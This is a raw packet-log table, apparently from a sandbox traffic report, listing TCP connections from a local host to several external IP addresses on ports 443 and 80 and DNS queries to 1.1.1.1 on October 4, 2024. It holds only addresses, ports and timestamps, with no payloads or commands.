Oct 4, 2024 19:18:17.729495049 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.729521036 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.729538918 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.729885101 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.729923010 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.729954004 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.729960918 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.729976892 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.729996920 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.816988945 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.817061901 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.817215919 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.817215919 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.817249060 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.817317009 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.817500114 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.817550898 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.817560911 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.817580938 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.817610979 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.817621946 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.818730116 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.818769932 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.818888903 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.818897963 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.818933964 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.819502115 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.819541931 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.819561958 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.819570065 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.819597960 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.819616079 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.820549965 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.820597887 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.820621967 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.820628881 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.820663929 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.820681095 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.821906090 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.821947098 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.821989059 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.821996927 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.822031021 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.822052002 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.822657108 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.822700977 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.822722912 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.822730064 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.822755098 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.822772980 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.823431969 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.823476076 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.823494911 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.823502064 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.823529005 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.823544979 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.908058882 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.908133984 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.908175945 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.908188105 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.908202887 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.908227921 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.908281088 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.908324957 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.908337116 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.908345938 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.908370018 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.908385038 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.909087896 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.909135103 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.909157038 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.909163952 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.909190893 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.909204960 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.909950018 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.909990072 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.910016060 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.910022974 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.910051107 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.910068989 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.910618067 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.910675049 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.910680056 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.910708904 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.910739899 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.910758018 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.912106037 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.912151098 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.912177086 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.912184000 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.912210941 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.912226915 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.912795067 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.912833929 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.912858963 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.912864923 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.912899017 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.912916899 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.913538933 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.913589954 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.913609982 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.913616896 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:17.913631916 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.913647890 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:17.913666010 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.000439882 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.000503063 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.000521898 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.000530958 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.000554085 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.000572920 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.002028942 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.002068996 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.002120972 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.002127886 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.002155066 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.002171993 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.002386093 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.002428055 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.002446890 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.002454042 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.002480984 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.002499104 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.003568888 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.003608942 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.003633976 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.003642082 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.003669024 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.003684044 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.004865885 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.004904985 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.004928112 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.004935980 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.004964113 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.004980087 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.005731106 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.005768061 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.005789995 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.005796909 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.005817890 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.005836964 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.007065058 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.007112980 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.007124901 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.007143021 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.007157087 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.007184982 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.007272959 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.007312059 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.007323980 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.007342100 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.007369995 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.007400036 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.009382963 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.009449005 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.009454966 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.009479046 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.009505033 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.009519100 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.009526014 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.009615898 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.009660006 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.013731956 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.013751984 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.013766050 CEST	49843	443	192.168.2.4	217.197.91.145
Oct 4, 2024 19:18:18.013772964 CEST	443	49843	217.197.91.145	192.168.2.4
Oct 4, 2024 19:18:18.128263950 CEST	49864	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:18.133480072 CEST	80	49864	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:18.133574009 CEST	49864	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:18.133738041 CEST	49864	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:18.133766890 CEST	49864	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:18.138978004 CEST	80	49864	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:18.139091969 CEST	80	49864	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:19.448740959 CEST	80	49864	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:19.449132919 CEST	80	49864	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:19.449250937 CEST	49864	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:19.458019018 CEST	49864	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:19.466027975 CEST	80	49864	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:28.820820093 CEST	50035	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:28.826529980 CEST	80	50035	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:28.826658964 CEST	50035	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:28.826828003 CEST	50035	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:28.826857090 CEST	50035	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:28.831943989 CEST	80	50035	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:28.832629919 CEST	80	50035	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:30.096446991 CEST	80	50035	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:30.096652031 CEST	80	50035	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:30.096822023 CEST	50035	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:30.096822023 CEST	50035	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:30.101908922 CEST	80	50035	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:36.430124044 CEST	50036	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:36.435903072 CEST	80	50036	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:36.436017990 CEST	50036	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:36.436177969 CEST	50036	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:36.436213970 CEST	50036	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:36.441099882 CEST	80	50036	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:36.441767931 CEST	80	50036	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:37.690862894 CEST	80	50036	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:37.690943956 CEST	80	50036	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:37.691008091 CEST	50036	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:37.691874027 CEST	50036	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:37.696819067 CEST	80	50036	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:45.953680038 CEST	50037	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:45.959500074 CEST	80	50037	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:45.959570885 CEST	50037	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:45.959671021 CEST	50037	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:45.959683895 CEST	50037	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:45.964981079 CEST	80	50037	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:45.964996099 CEST	80	50037	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:47.222836971 CEST	80	50037	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:47.222884893 CEST	80	50037	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:47.223334074 CEST	50037	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:47.232820034 CEST	50037	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:47.239149094 CEST	80	50037	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:57.421247005 CEST	50038	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:57.426314116 CEST	80	50038	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:57.426393986 CEST	50038	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:57.426565886 CEST	50038	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:57.426613092 CEST	50038	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:57.431416035 CEST	80	50038	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:57.431901932 CEST	80	50038	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:58.725389004 CEST	80	50038	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:58.725440979 CEST	80	50038	177.129.90.106	192.168.2.4
Oct 4, 2024 19:19:58.725636005 CEST	50038	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:58.725713015 CEST	50038	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:19:58.730665922 CEST	80	50038	177.129.90.106	192.168.2.4
Oct 4, 2024 19:20:12.839889050 CEST	50039	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:12.844799995 CEST	80	50039	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:12.844893932 CEST	50039	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:12.845024109 CEST	50039	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:12.845060110 CEST	50039	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:12.849987984 CEST	80	50039	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:12.850317001 CEST	80	50039	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:14.259684086 CEST	80	50039	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:14.259708881 CEST	80	50039	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:14.259793043 CEST	50039	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:14.259963036 CEST	50039	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:14.265479088 CEST	80	50039	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:25.867358923 CEST	50040	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:26.756330967 CEST	80	50040	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:26.756417990 CEST	50040	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:26.766762018 CEST	50040	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:26.766762018 CEST	50040	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:26.771835089 CEST	80	50040	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:26.771863937 CEST	80	50040	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:28.126101017 CEST	80	50040	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:28.126162052 CEST	80	50040	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:28.126238108 CEST	50040	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:28.126447916 CEST	50040	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:28.131453991 CEST	80	50040	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:41.507024050 CEST	50041	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:41.512254953 CEST	80	50041	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:41.512350082 CEST	50041	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:41.512470007 CEST	50041	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:41.512487888 CEST	50041	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:41.517333984 CEST	80	50041	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:41.517349958 CEST	80	50041	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:42.964591026 CEST	80	50041	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:42.965174913 CEST	80	50041	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:42.965243101 CEST	50041	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:42.965286016 CEST	50041	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:42.972560883 CEST	80	50041	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:56.191772938 CEST	50042	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:56.198712111 CEST	80	50042	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:56.198828936 CEST	50042	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:56.199033976 CEST	50042	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:56.199057102 CEST	50042	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:56.206754923 CEST	80	50042	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:56.206785917 CEST	80	50042	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:57.598699093 CEST	80	50042	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:57.598757982 CEST	80	50042	180.75.11.133	192.168.2.4
Oct 4, 2024 19:20:57.598841906 CEST	50042	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:57.599020958 CEST	50042	80	192.168.2.4	180.75.11.133
Oct 4, 2024 19:20:57.603846073 CEST	80	50042	180.75.11.133	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 19:17:27.700813055 CEST	59016	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:17:28.741741896 CEST	59016	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:17:29.742078066 CEST	59016	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:17:29.890300989 CEST	53	59016	1.1.1.1	192.168.2.4
Oct 4, 2024 19:17:29.890316010 CEST	53	59016	1.1.1.1	192.168.2.4
Oct 4, 2024 19:17:29.890326023 CEST	53	59016	1.1.1.1	192.168.2.4
Oct 4, 2024 19:18:13.850114107 CEST	59167	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:18:13.858931065 CEST	53	59167	1.1.1.1	192.168.2.4
Oct 4, 2024 19:18:32.498121023 CEST	62229	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:18:33.515808105 CEST	62229	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:18:33.557799101 CEST	53	62229	1.1.1.1	192.168.2.4
Oct 4, 2024 19:18:33.558357954 CEST	53	62229	1.1.1.1	192.168.2.4
Oct 4, 2024 19:18:33.566003084 CEST	58965	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:18:34.570085049 CEST	58965	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:18:34.734561920 CEST	53	58965	1.1.1.1	192.168.2.4
Oct 4, 2024 19:18:34.734599113 CEST	53	58965	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:44.162974119 CEST	54411	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:45.190474033 CEST	54411	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:45.620026112 CEST	53	54411	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:45.620125055 CEST	53	54411	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:45.641482115 CEST	49310	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:46.656568050 CEST	49310	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:46.745006084 CEST	53	49310	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:46.745026112 CEST	53	49310	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:56.829653025 CEST	62518	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:57.830749035 CEST	62518	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:57.915266991 CEST	53	62518	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:57.916254044 CEST	53	62518	1.1.1.1	192.168.2.4
Oct 4, 2024 19:19:57.950525999 CEST	64335	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:19:58.484646082 CEST	53	64335	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:10.465905905 CEST	49327	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:10.645824909 CEST	62943	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:11.461026907 CEST	49327	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:11.632920980 CEST	62943	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:11.881942987 CEST	53	49327	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:11.881966114 CEST	53	49327	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:12.034105062 CEST	60506	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:12.648463011 CEST	62943	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:12.838850975 CEST	53	62943	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:12.838876009 CEST	53	62943	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:12.838891029 CEST	53	62943	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:12.967906952 CEST	53	60506	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:24.607144117 CEST	59310	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:25.121330023 CEST	53	59310	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:25.162956953 CEST	61491	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:26.175026894 CEST	61491	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:26.754235983 CEST	53	61491	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:26.757999897 CEST	53	61491	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:39.959743977 CEST	60061	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:39.974594116 CEST	53	60061	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:40.002228022 CEST	64212	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:40.950891972 CEST	53	64212	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:54.569093943 CEST	54833	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:55.577992916 CEST	54833	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:55.620475054 CEST	53	54833	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:55.620501041 CEST	53	54833	1.1.1.1	192.168.2.4
Oct 4, 2024 19:20:55.642632008 CEST	64457	53	192.168.2.4	1.1.1.1
Oct 4, 2024 19:20:56.644588947 CEST	64457	53	192.168.2.4	1.1.1.1
